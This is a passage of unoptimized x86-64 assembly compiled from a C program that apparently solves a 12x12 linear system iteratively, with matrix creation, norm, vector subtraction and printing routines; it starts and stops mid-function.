movl %eax, -56(%rbp) ## 4-byte Spill
LBB0_20: ## in Loop: Header=BB0_16 Depth=2
movl -56(%rbp), %eax ## 4-byte Reload
movl %eax, -32(%rbp)
## %bb.21: ## in Loop: Header=BB0_16 Depth=2
movl -28(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
jmp LBB0_16
LBB0_22: ## in Loop: Header=BB0_14 Depth=1
movsd -48(%rbp), %xmm1 ## xmm1 = mem[0],zero
movsd -40(%rbp), %xmm0 ## xmm0 = mem[0],zero
subsd %xmm1, %xmm0
movsd %xmm0, -40(%rbp)
## %bb.23: ## in Loop: Header=BB0_14 Depth=1
movl -24(%rbp), %eax
addl $1, %eax
movl %eax, -24(%rbp)
jmp LBB0_14
LBB0_24:
movsd -40(%rbp), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -8(%rbp)
LBB0_25:
movsd -8(%rbp), %xmm0 ## xmm0 = mem[0],zero
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _NormMatrix ## -- Begin function NormMatrix
.p2align 4, 0x90
_NormMatrix: ## @NormMatrix
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movl %esi, -12(%rbp)
xorps %xmm0, %xmm0
movsd %xmm0, -32(%rbp)
xorps %xmm0, %xmm0
movsd %xmm0, -40(%rbp)
movl $0, -16(%rbp)
LBB1_1: ## =>This Loop Header: Depth=1
## Child Loop BB1_3 Depth 2
movl -16(%rbp), %eax
cmpl -12(%rbp), %eax
jge LBB1_8
## %bb.2: ## in Loop: Header=BB1_1 Depth=1
movl $0, -20(%rbp)
LBB1_3: ## Parent Loop BB1_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -20(%rbp), %eax
cmpl -12(%rbp), %eax
jge LBB1_6
## %bb.4: ## in Loop: Header=BB1_3 Depth=2
movq -8(%rbp), %rax
movl -16(%rbp), %ecx
imull -12(%rbp), %ecx
addl -20(%rbp), %ecx
movslq %ecx, %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movq -8(%rbp), %rax
movl -16(%rbp), %ecx
imull -12(%rbp), %ecx
addl -20(%rbp), %ecx
movslq %ecx, %rcx
movsd (%rax,%rcx,8), %xmm2 ## xmm2 = mem[0],zero
movsd -40(%rbp), %xmm1 ## xmm1 = mem[0],zero
mulsd %xmm2, %xmm0
addsd %xmm1, %xmm0
movsd %xmm0, -40(%rbp)
## %bb.5: ## in Loop: Header=BB1_3 Depth=2
movl -20(%rbp), %eax
addl $1, %eax
movl %eax, -20(%rbp)
jmp LBB1_3
LBB1_6: ## in Loop: Header=BB1_1 Depth=1
jmp LBB1_7
LBB1_7: ## in Loop: Header=BB1_1 Depth=1
movl -16(%rbp), %eax
addl $1, %eax
movl %eax, -16(%rbp)
jmp LBB1_1
LBB1_8:
movsd -40(%rbp), %xmm0 ## xmm0 = mem[0],zero
sqrtsd %xmm0, %xmm0
movsd %xmm0, -32(%rbp)
movsd -32(%rbp), %xmm0 ## xmm0 = mem[0],zero
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _PrintVector ## -- Begin function PrintVector
.p2align 4, 0x90
_PrintVector: ## @PrintVector
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movl %edx, -20(%rbp)
movl $0, -24(%rbp)
LBB2_1: ## =>This Inner Loop Header: Depth=1
movl -24(%rbp), %eax
cmpl -20(%rbp), %eax
jge LBB2_4
## %bb.2: ## in Loop: Header=BB2_1 Depth=1
movq -8(%rbp), %rdi
movq -16(%rbp), %rax
movslq -24(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str(%rip), %rsi
movb $1, %al
callq _fprintf
## %bb.3: ## in Loop: Header=BB2_1 Depth=1
movl -24(%rbp), %eax
addl $1, %eax
movl %eax, -24(%rbp)
jmp LBB2_1
LBB2_4:
movq -8(%rbp), %rdi
leaq l_.str.1(%rip), %rsi
movb $0, %al
callq _fprintf
movq -8(%rbp), %rdi
xorl %eax, %eax
movl %eax, %esi
xorl %edx, %edx
callq _fseek
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__literal8,8byte_literals
.p2align 3 ## -- Begin function CreateMatrix
LCPI3_0:
.quad 0x4024000000000000 ## double 10
.section __TEXT,__text,regular,pure_instructions
.globl _CreateMatrix
.p2align 4, 0x90
_CreateMatrix: ## @CreateMatrix
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl %edi, -4(%rbp)
movl $0, -16(%rbp)
movslq -4(%rbp), %rdi
shlq $3, %rdi
movslq -4(%rbp), %rax
imulq %rax, %rdi
callq _malloc
movq %rax, -24(%rbp)
movl $0, -8(%rbp)
LBB3_1: ## =>This Loop Header: Depth=1
## Child Loop BB3_3 Depth 2
## Child Loop BB3_6 Depth 2
## Child Loop BB3_9 Depth 3
movl -8(%rbp), %eax
cmpl -4(%rbp), %eax
jge LBB3_18
## %bb.2: ## in Loop: Header=BB3_1 Depth=1
jmp LBB3_3
LBB3_3: ## Parent Loop BB3_1 Depth=1
## => This Inner Loop Header: Depth=2
callq _rand
movl $10, %ecx
cltd
idivl %ecx
movl %edx, -16(%rbp)
cmpl $1, %edx
jg LBB3_5
## %bb.4: ## in Loop: Header=BB3_3 Depth=2
jmp LBB3_3
LBB3_5: ## in Loop: Header=BB3_1 Depth=1
cvtsi2sdl -16(%rbp), %xmm0
movq -24(%rbp), %rax
movl -8(%rbp), %ecx
imull -4(%rbp), %ecx
addl -8(%rbp), %ecx
movslq %ecx, %rcx
movsd %xmm0, (%rax,%rcx,8)
movl $0, -12(%rbp)
LBB3_6: ## Parent Loop BB3_1 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB3_9 Depth 3
movl -12(%rbp), %eax
cmpl -4(%rbp), %eax
jge LBB3_16
## %bb.7: ## in Loop: Header=BB3_6 Depth=2
movl -12(%rbp), %eax
cmpl -8(%rbp), %eax
je LBB3_14
## %bb.8: ## in Loop: Header=BB3_6 Depth=2
jmp LBB3_9
LBB3_9: ## Parent Loop BB3_1 Depth=1
## Parent Loop BB3_6 Depth=2
## => This Inner Loop Header: Depth=3
callq _rand
movl $10, %ecx
cltd
idivl %ecx
movl %edx, -16(%rbp)
movb $1, %al
cmpl $0, %edx
movb %al, -25(%rbp) ## 1-byte Spill
je LBB3_11
## %bb.10: ## in Loop: Header=BB3_9 Depth=3
cvtsi2sdl -16(%rbp), %xmm0
movq -24(%rbp), %rax
movl -8(%rbp), %ecx
imull -4(%rbp), %ecx
addl -8(%rbp), %ecx
movslq %ecx, %rcx
ucomisd (%rax,%rcx,8), %xmm0
setae %al
movb %al, -25(%rbp) ## 1-byte Spill
LBB3_11: ## in Loop: Header=BB3_9 Depth=3
movb -25(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB3_12
jmp LBB3_13
LBB3_12: ## in Loop: Header=BB3_9 Depth=3
jmp LBB3_9
LBB3_13: ## in Loop: Header=BB3_6 Depth=2
cvtsi2sdl -16(%rbp), %xmm0
movsd LCPI3_0(%rip), %xmm1 ## xmm1 = mem[0],zero
divsd %xmm1, %xmm0
movq -24(%rbp), %rax
movl -8(%rbp), %ecx
imull -4(%rbp), %ecx
addl -12(%rbp), %ecx
movslq %ecx, %rcx
movsd %xmm0, (%rax,%rcx,8)
LBB3_14: ## in Loop: Header=BB3_6 Depth=2
jmp LBB3_15
LBB3_15: ## in Loop: Header=BB3_6 Depth=2
movl -12(%rbp), %eax
addl $1, %eax
movl %eax, -12(%rbp)
jmp LBB3_6
LBB3_16: ## in Loop: Header=BB3_1 Depth=1
jmp LBB3_17
LBB3_17: ## in Loop: Header=BB3_1 Depth=1
movl -8(%rbp), %eax
addl $1, %eax
movl %eax, -8(%rbp)
jmp LBB3_1
LBB3_18:
movq -24(%rbp), %rax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _ReadMatrix ## -- Begin function ReadMatrix
.p2align 4, 0x90
_ReadMatrix: ## @ReadMatrix
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movl $1152, %edi ## imm = 0x480
callq _malloc
movq %rax, -24(%rbp)
movl $0, -12(%rbp)
LBB4_1: ## =>This Loop Header: Depth=1
## Child Loop BB4_3 Depth 2
cmpl $12, -12(%rbp)
jge LBB4_8
## %bb.2: ## in Loop: Header=BB4_1 Depth=1
movl $0, -16(%rbp)
LBB4_3: ## Parent Loop BB4_1 Depth=1
## => This Inner Loop Header: Depth=2
cmpl $12, -16(%rbp)
jge LBB4_6
## %bb.4: ## in Loop: Header=BB4_3 Depth=2
movq -8(%rbp), %rdi
movq -24(%rbp), %rdx
imull $12, -12(%rbp), %eax
addl -16(%rbp), %eax
cltq
shlq $3, %rax
addq %rax, %rdx
leaq L_.str.2(%rip), %rsi
movb $0, %al
callq _fscanf
## %bb.5: ## in Loop: Header=BB4_3 Depth=2
movl -16(%rbp), %eax
addl $1, %eax
movl %eax, -16(%rbp)
jmp LBB4_3
LBB4_6: ## in Loop: Header=BB4_1 Depth=1
jmp LBB4_7
LBB4_7: ## in Loop: Header=BB4_1 Depth=1
movl -12(%rbp), %eax
addl $1, %eax
movl %eax, -12(%rbp)
jmp LBB4_1
LBB4_8:
movq -24(%rbp), %rax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _PrintMatrix ## -- Begin function PrintMatrix
.p2align 4, 0x90
_PrintMatrix: ## @PrintMatrix
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movl %edx, -20(%rbp)
movl $0, -24(%rbp)
LBB5_1: ## =>This Loop Header: Depth=1
## Child Loop BB5_3 Depth 2
movl -24(%rbp), %eax
cmpl -20(%rbp), %eax
jge LBB5_8
## %bb.2: ## in Loop: Header=BB5_1 Depth=1
movl $0, -28(%rbp)
LBB5_3: ## Parent Loop BB5_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -28(%rbp), %eax
cmpl -20(%rbp), %eax
jge LBB5_6
## %bb.4: ## in Loop: Header=BB5_3 Depth=2
movq -8(%rbp), %rdi
movq -16(%rbp), %rax
movl -24(%rbp), %ecx
imull -20(%rbp), %ecx
addl -28(%rbp), %ecx
movslq %ecx, %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.3(%rip), %rsi
movb $1, %al
callq _fprintf
## %bb.5: ## in Loop: Header=BB5_3 Depth=2
movl -28(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
jmp LBB5_3
LBB5_6: ## in Loop: Header=BB5_1 Depth=1
movq -8(%rbp), %rdi
leaq L_.str.4(%rip), %rsi
movb $0, %al
callq _fprintf
## %bb.7: ## in Loop: Header=BB5_1 Depth=1
movl -24(%rbp), %eax
addl $1, %eax
movl %eax, -24(%rbp)
jmp LBB5_1
LBB5_8:
movq -8(%rbp), %rdi
leaq l_.str.1(%rip), %rsi
movb $0, %al
callq _fprintf
movq -8(%rbp), %rdi
xorl %eax, %eax
movl %eax, %esi
xorl %edx, %edx
callq _fseek
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _CreateVector ## -- Begin function CreateVector
.p2align 4, 0x90
_CreateVector: ## @CreateVector
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl %edi, -4(%rbp)
movslq -4(%rbp), %rdi
shlq $3, %rdi
callq _malloc
movq %rax, -16(%rbp)
movl $0, -8(%rbp)
LBB6_1: ## =>This Inner Loop Header: Depth=1
movl -8(%rbp), %eax
cmpl -4(%rbp), %eax
jge LBB6_4
## %bb.2: ## in Loop: Header=BB6_1 Depth=1
callq _rand
movl $10, %ecx
cltd
idivl %ecx
cvtsi2sd %edx, %xmm0
movq -16(%rbp), %rax
movslq -8(%rbp), %rcx
movsd %xmm0, (%rax,%rcx,8)
## %bb.3: ## in Loop: Header=BB6_1 Depth=1
movl -8(%rbp), %eax
addl $1, %eax
movl %eax, -8(%rbp)
jmp LBB6_1
LBB6_4:
movq -16(%rbp), %rax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__literal8,8byte_literals
.p2align 3 ## -- Begin function CreateAlphaMatrix
LCPI7_0:
.quad 0xbff0000000000000 ## double -1
.section __TEXT,__text,regular,pure_instructions
.globl _CreateAlphaMatrix
.p2align 4, 0x90
_CreateAlphaMatrix: ## @CreateAlphaMatrix
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movl %esi, -12(%rbp)
movslq -12(%rbp), %rdi
shlq $3, %rdi
movslq -12(%rbp), %rax
imulq %rax, %rdi
callq _malloc
movq %rax, -24(%rbp)
movl $0, -28(%rbp)
LBB7_1: ## =>This Loop Header: Depth=1
## Child Loop BB7_3 Depth 2
movl -28(%rbp), %eax
cmpl -12(%rbp), %eax
jge LBB7_11
## %bb.2: ## in Loop: Header=BB7_1 Depth=1
movl $0, -32(%rbp)
LBB7_3: ## Parent Loop BB7_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -32(%rbp), %eax
cmpl -12(%rbp), %eax
jge LBB7_9
## %bb.4: ## in Loop: Header=BB7_3 Depth=2
movl -32(%rbp), %eax
cmpl -28(%rbp), %eax
jne LBB7_6
## %bb.5: ## in Loop: Header=BB7_3 Depth=2
movq -24(%rbp), %rax
movl -28(%rbp), %ecx
imull -12(%rbp), %ecx
addl -32(%rbp), %ecx
movslq %ecx, %rcx
xorps %xmm0, %xmm0
movsd %xmm0, (%rax,%rcx,8)
jmp LBB7_7
LBB7_6: ## in Loop: Header=BB7_3 Depth=2
movq -8(%rbp), %rax
movl -28(%rbp), %ecx
imull -12(%rbp), %ecx
addl -32(%rbp), %ecx
movslq %ecx, %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movq -8(%rbp), %rax
movl -28(%rbp), %ecx
imull -12(%rbp), %ecx
addl -28(%rbp), %ecx
movslq %ecx, %rcx
divsd (%rax,%rcx,8), %xmm0
movsd LCPI7_0(%rip), %xmm1 ## xmm1 = mem[0],zero
mulsd %xmm1, %xmm0
movq -24(%rbp), %rax
movl -28(%rbp), %ecx
imull -12(%rbp), %ecx
addl -32(%rbp), %ecx
movslq %ecx, %rcx
movsd %xmm0, (%rax,%rcx,8)
LBB7_7: ## in Loop: Header=BB7_3 Depth=2
jmp LBB7_8
LBB7_8: ## in Loop: Header=BB7_3 Depth=2
movl -32(%rbp), %eax
addl $1, %eax
movl %eax, -32(%rbp)
jmp LBB7_3
LBB7_9: ## in Loop: Header=BB7_1 Depth=1
jmp LBB7_10
LBB7_10: ## in Loop: Header=BB7_1 Depth=1
movl -28(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
jmp LBB7_1
LBB7_11:
movq -24(%rbp), %rax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _CreateBetaVector ## -- Begin function CreateBetaVector
.p2align 4, 0x90
_CreateBetaVector: ## @CreateBetaVector
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movl %edx, -20(%rbp)
movslq -20(%rbp), %rdi
shlq $3, %rdi
callq _malloc
movq %rax, -32(%rbp)
movl $0, -36(%rbp)
LBB8_1: ## =>This Inner Loop Header: Depth=1
movl -36(%rbp), %eax
cmpl -20(%rbp), %eax
jge LBB8_4
## %bb.2: ## in Loop: Header=BB8_1 Depth=1
movq -8(%rbp), %rax
movslq -36(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movq -16(%rbp), %rax
movl -36(%rbp), %ecx
imull -20(%rbp), %ecx
addl -36(%rbp), %ecx
movslq %ecx, %rcx
divsd (%rax,%rcx,8), %xmm0
movq -32(%rbp), %rax
movslq -36(%rbp), %rcx
movsd %xmm0, (%rax,%rcx,8)
## %bb.3: ## in Loop: Header=BB8_1 Depth=1
movl -36(%rbp), %eax
addl $1, %eax
movl %eax, -36(%rbp)
jmp LBB8_1
LBB8_4:
movq -32(%rbp), %rax
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _CreateXVector ## -- Begin function CreateXVector
.p2align 4, 0x90
_CreateXVector: ## @CreateXVector
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq %rdx, -24(%rbp)
movl %ecx, -28(%rbp)
movslq -28(%rbp), %rdi
shlq $3, %rdi
callq _malloc
movq %rax, -40(%rbp)
movl $0, -44(%rbp)
LBB9_1: ## =>This Loop Header: Depth=1
## Child Loop BB9_3 Depth 2
movl -44(%rbp), %eax
cmpl -28(%rbp), %eax
jge LBB9_8
## %bb.2: ## in Loop: Header=BB9_1 Depth=1
movq -8(%rbp), %rax
movslq -44(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movq -40(%rbp), %rax
movslq -44(%rbp), %rcx
movsd %xmm0, (%rax,%rcx,8)
movl $0, -48(%rbp)
LBB9_3: ## Parent Loop BB9_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -48(%rbp), %eax
cmpl -28(%rbp), %eax
jge LBB9_6
## %bb.4: ## in Loop: Header=BB9_3 Depth=2
movq -16(%rbp), %rax
movl -44(%rbp), %ecx
imull -28(%rbp), %ecx
addl -48(%rbp), %ecx
movslq %ecx, %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movq -24(%rbp), %rax
movslq -48(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm2 ## xmm2 = mem[0],zero
movq -40(%rbp), %rax
movslq -44(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm1 ## xmm1 = mem[0],zero
mulsd %xmm2, %xmm0
addsd %xmm1, %xmm0
movsd %xmm0, (%rax,%rcx,8)
## %bb.5: ## in Loop: Header=BB9_3 Depth=2
movl -48(%rbp), %eax
addl $1, %eax
movl %eax, -48(%rbp)
jmp LBB9_3
LBB9_6: ## in Loop: Header=BB9_1 Depth=1
jmp LBB9_7
LBB9_7: ## in Loop: Header=BB9_1 Depth=1
movl -44(%rbp), %eax
addl $1, %eax
movl %eax, -44(%rbp)
jmp LBB9_1
LBB9_8:
movq -40(%rbp), %rax
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _MatrixMul ## -- Begin function MatrixMul
.p2align 4, 0x90
_MatrixMul: ## @MatrixMul
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movl %edx, -20(%rbp)
movslq -20(%rbp), %rdi
shlq $3, %rdi
callq _malloc
movq %rax, -32(%rbp)
movl $0, -36(%rbp)
LBB10_1: ## =>This Loop Header: Depth=1
## Child Loop BB10_3 Depth 2
movl -36(%rbp), %eax
cmpl -20(%rbp), %eax
jge LBB10_8
## %bb.2: ## in Loop: Header=BB10_1 Depth=1
movq -32(%rbp), %rax
movslq -36(%rbp), %rcx
xorps %xmm0, %xmm0
movsd %xmm0, (%rax,%rcx,8)
movl $0, -40(%rbp)
LBB10_3: ## Parent Loop BB10_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -40(%rbp), %eax
cmpl -20(%rbp), %eax
jge LBB10_6
## %bb.4: ## in Loop: Header=BB10_3 Depth=2
movq -8(%rbp), %rax
movl -36(%rbp), %ecx
imull -20(%rbp), %ecx
addl -40(%rbp), %ecx
movslq %ecx, %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movq -16(%rbp), %rax
movslq -40(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm2 ## xmm2 = mem[0],zero
movq -32(%rbp), %rax
movslq -36(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm1 ## xmm1 = mem[0],zero
mulsd %xmm2, %xmm0
addsd %xmm1, %xmm0
movsd %xmm0, (%rax,%rcx,8)
## %bb.5: ## in Loop: Header=BB10_3 Depth=2
movl -40(%rbp), %eax
addl $1, %eax
movl %eax, -40(%rbp)
jmp LBB10_3
LBB10_6: ## in Loop: Header=BB10_1 Depth=1
jmp LBB10_7
LBB10_7: ## in Loop: Header=BB10_1 Depth=1
movl -36(%rbp), %eax
addl $1, %eax
movl %eax, -36(%rbp)
jmp LBB10_1
LBB10_8:
movq -32(%rbp), %rax
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _FindNorm ## -- Begin function FindNorm
.p2align 4, 0x90
_FindNorm: ## @FindNorm
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movl %esi, -12(%rbp)
xorps %xmm0, %xmm0
movsd %xmm0, -24(%rbp)
movl $0, -16(%rbp)
LBB11_1: ## =>This Inner Loop Header: Depth=1
movl -16(%rbp), %eax
cmpl -12(%rbp), %eax
jge LBB11_6
## %bb.2: ## in Loop: Header=BB11_1 Depth=1
movq -8(%rbp), %rax
movslq -16(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
ucomisd -24(%rbp), %xmm0
jbe LBB11_4
## %bb.3: ## in Loop: Header=BB11_1 Depth=1
movq -8(%rbp), %rax
movslq -16(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -24(%rbp)
LBB11_4: ## in Loop: Header=BB11_1 Depth=1
jmp LBB11_5
LBB11_5: ## in Loop: Header=BB11_1 Depth=1
movl -16(%rbp), %eax
addl $1, %eax
movl %eax, -16(%rbp)
jmp LBB11_1
LBB11_6:
movsd -24(%rbp), %xmm0 ## xmm0 = mem[0],zero
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__literal16,16byte_literals
.p2align 4 ## -- Begin function VectSub
LCPI12_0:
.quad 0x7fffffffffffffff ## double NaN
.quad 0x7fffffffffffffff ## double NaN
.section __TEXT,__text,regular,pure_instructions
.globl _VectSub
.p2align 4, 0x90
_VectSub: ## @VectSub
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movl %edx, -20(%rbp)
movslq -20(%rbp), %rdi
shlq $3, %rdi
callq _malloc
movq %rax, -32(%rbp)
movl $0, -24(%rbp)
LBB12_1: ## =>This Inner Loop Header: Depth=1
movl -24(%rbp), %eax
cmpl -20(%rbp), %eax
jge LBB12_4
## %bb.2: ## in Loop: Header=BB12_1 Depth=1
movq -8(%rbp), %rax
movslq -24(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movq -16(%rbp), %rax
movslq -24(%rbp), %rcx
subsd (%rax,%rcx,8), %xmm0
movaps LCPI12_0(%rip), %xmm1 ## xmm1 = [NaN,NaN]
pand %xmm1, %xmm0
movq -32(%rbp), %rax
movslq -24(%rbp), %rcx
movsd %xmm0, (%rax,%rcx,8)
## %bb.3: ## in Loop: Header=BB12_1 Depth=1
movl -24(%rbp), %eax
addl $1, %eax
movl %eax, -24(%rbp)
jmp LBB12_1
LBB12_4:
movq -32(%rbp), %rax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__literal8,8byte_literals
.p2align 3 ## -- Begin function main
LCPI13_0:
.quad 0x3fb999999999999a ## double 0.10000000000000001
LCPI13_1:
.quad 0x3cd203af9ee75616 ## double 1.0000000000000001E-15
LCPI13_2:
.quad 0x3d06849b86a12b9b ## double 9.9999999999999999E-15
LCPI13_3:
.quad 0x4059000000000000 ## double 100
LCPI13_4:
.quad 0x3ff0000000000000 ## double 1
LCPI13_5:
.quad 0x4000000000000000 ## double 2
LCPI13_6:
.quad 0x3fb5555555555555 ## double 0.083333333333333329
LCPI13_7:
.quad 0x3ff199999999999a ## double 1.1000000000000001
LCPI13_8:
.quad 0x4024000000000000 ## double 10
.section __TEXT,__text,regular,pure_instructions
.globl _main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $176, %rsp
movl $0, -4(%rbp)
movsd LCPI13_0(%rip), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -72(%rbp)
movl $12, %edi
callq _CreateMatrix
movq %rax, -24(%rbp)
movl $12, %edi
callq _CreateVector
movq %rax, -64(%rbp)
movq -24(%rbp), %rdi
movq -64(%rbp), %rsi
movl $12, %edx
callq _MatrixMul
movq %rax, -32(%rbp)
movl $1152, %edi ## imm = 0x480
callq _malloc
movq %rax, -80(%rbp)
movl $96, %edi
callq _malloc
movq %rax, -88(%rbp)
movl $0, -100(%rbp)
LBB13_1: ## =>This Loop Header: Depth=1
## Child Loop BB13_3 Depth 2
cmpl $12, -100(%rbp)
jge LBB13_8
## %bb.2: ## in Loop: Header=BB13_1 Depth=1
movl $0, -104(%rbp)
LBB13_3: ## Parent Loop BB13_1 Depth=1
## => This Inner Loop Header: Depth=2
cmpl $12, -104(%rbp)
jge LBB13_6
## %bb.4: ## in Loop: Header=BB13_3 Depth=2
movq -24(%rbp), %rax
imull $12, -100(%rbp), %ecx
addl -104(%rbp), %ecx
movslq %ecx, %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movq -80(%rbp), %rax
imull $12, -100(%rbp), %ecx
addl -104(%rbp), %ecx
movslq %ecx, %rcx
movsd %xmm0, (%rax,%rcx,8)
## %bb.5: ## in Loop: Header=BB13_3 Depth=2
movl -104(%rbp), %eax
addl $1, %eax
movl %eax, -104(%rbp)
jmp LBB13_3
LBB13_6: ## in Loop: Header=BB13_1 Depth=1
jmp LBB13_7
LBB13_7: ## in Loop: Header=BB13_1 Depth=1
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -100(%rbp)
jmp LBB13_1
LBB13_8:
movl $0, -100(%rbp)
LBB13_9: ## =>This Inner Loop Header: Depth=1
cmpl $12, -100(%rbp)
jge LBB13_12
## %bb.10: ## in Loop: Header=BB13_9 Depth=1
movq -32(%rbp), %rax
movslq -100(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movq -88(%rbp), %rax
movslq -100(%rbp), %rcx
movsd %xmm0, (%rax,%rcx,8)
## %bb.11: ## in Loop: Header=BB13_9 Depth=1
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -100(%rbp)
jmp LBB13_9
LBB13_12:
leaq L_.str.5(%rip), %rdi
leaq L_.str.6(%rip), %rsi
callq _fopen
movq %rax, -16(%rbp)
LBB13_13: ## =>This Loop Header: Depth=1
## Child Loop BB13_15 Depth 2
movsd -72(%rbp), %xmm0 ## xmm0 = mem[0],zero
movsd LCPI13_1(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jb LBB13_19
## %bb.14: ## in Loop: Header=BB13_13 Depth=1
movq -24(%rbp), %rdi
movl $12, %esi
callq _CreateAlphaMatrix
movq %rax, -40(%rbp)
movq -32(%rbp), %rdi
movq -24(%rbp), %rsi
movl $12, %edx
callq _CreateBetaVector
movq %rax, -48(%rbp)
movq -48(%rbp), %rax
movq %rax, -56(%rbp)
movl $0, -100(%rbp)
LBB13_15: ## Parent Loop BB13_13 Depth=1
## => This Inner Loop Header: Depth=2
movq -64(%rbp), %rdi
movq -56(%rbp), %rsi
movl $12, %edx
callq _VectSub
movq %rax, %rdi
movl $12, %esi
callq _FindNorm
ucomisd -72(%rbp), %xmm0
jbe LBB13_18
## %bb.16: ## in Loop: Header=BB13_15 Depth=2
movq -48(%rbp), %rdi
movq -40(%rbp), %rsi
movq -56(%rbp), %rdx
movl $12, %ecx
callq _CreateXVector
movq %rax, -56(%rbp)
## %bb.17: ## in Loop: Header=BB13_15 Depth=2
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -100(%rbp)
jmp LBB13_15
LBB13_18: ## in Loop: Header=BB13_13 Depth=1
movq -16(%rbp), %rax
movq %rax, -112(%rbp) ## 8-byte Spill
movq -64(%rbp), %rdi
